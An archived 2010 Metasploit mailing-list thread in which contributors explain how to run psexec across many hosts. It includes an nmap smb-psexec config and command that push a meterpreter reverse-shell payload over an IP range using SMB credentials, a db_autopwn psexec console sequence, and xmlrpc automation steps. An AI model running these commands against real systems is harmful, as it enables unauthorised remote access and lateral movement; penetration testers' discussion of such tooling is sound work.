Metasploit mailing list archives
Re: mods to psexec
From: Danilo Nascimento <danilo.nascimento.c () gmail com>
Date: Fri, 26 Mar 2010 08:44:06 -0300
I guess that you also can use the nmap smb-psexec script.
Basically you must generate a meterpreter rev exe via mspayload,
create a smb-psexec config, setup a meterpreter rev payload on
multi/handler and then run nmap.
meterpreter.lua (smb-psexec config)
----------------------------------
module(... or "pwdump", package.seeall)
overrides = {}
modules = {}
local mod
mod = {}
mod.name = "msf"
mod.program = "<REPLACE WITH PAYLOAD PATH>"
table.insert(modules, mod)
----------------------------------
nmap command line:
nmap --script smb-psexec
--script-args=smbuser=USERNAME,smbpass=USERPASS,config=meterpreter.lua
-p445 IP_RANGE
I haven't tried it yet so lets us know if you try it.
[]'s Danilo Nascimento
On Fri, Mar 26, 2010 at 2:02 AM, Nelson <komseh () gmail com> wrote:
Here's how I do it: setg SMBUser Administrator setg SMBPass Password setg SMBDomain DOMAIN (if needed) db_driver postgresql db_create msf:msf@localhost/msf db_nmap -p445 192.168.1.1-254 db_autopwn -p -e -r -m psexec On Thu, Mar 25, 2010 at 11:22 AM, Ulisses Castro <uss.thebug () gmail com> wrote:On Thu, Mar 25, 2010 at 8:59 AM, Robin Wood <dninja () gmail com> wrote:Hi I've been asked by a colleague how easy it would be to modify psexec so it would take multiple hosts rather than a single one. Each session that came back would then be backgrounded or sent off to a multi-handler. Before I spend any time looking into doing this I wanted to check if there was any better way to do it or if the functionality already existed in other modules. If not then I'll have a look and see if I can come up with some code.Hi Robin! You can use Metasploit with xmlrpc plugin + any language that support xml... just: msf > load xmlrpc Pass=123456 ServerType=Web [*] XMLRPC Service: 127.0.0.1:55553 [*] XMLRPC Username: msf [*] XMLRPC Password: 123456 [*] XMLRPC Server Type: Web [*] XMLRPC Web URI: /RPC2 [*] Successfully loaded plugin: xmlrpc msf > And now you can automate whatever you want inside Metasploit, just write some script/program that send metasploit commands via xmlrpc, a good example is Nsploit. Good post about this: http://blog.happypacket.net/2009/12/psexec-scanner-via-metasploit-xmlrpc.html Btw, you could try the new Ruby implementation in .RC files like HD said. Cheers, UlissesRobin _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- mods to psexec Robin Wood (Mar 25)
- Re: mods to psexec HD Moore (Mar 25)
- Re: mods to psexec Robin Wood (Mar 25)
- Re: mods to psexec Ulisses Castro (Mar 25)
- Re: mods to psexec Nelson (Mar 25)
- Re: mods to psexec Danilo Nascimento (Mar 26)
- Re: mods to psexec Nelson (Mar 25)
- Re: mods to psexec HD Moore (Mar 25)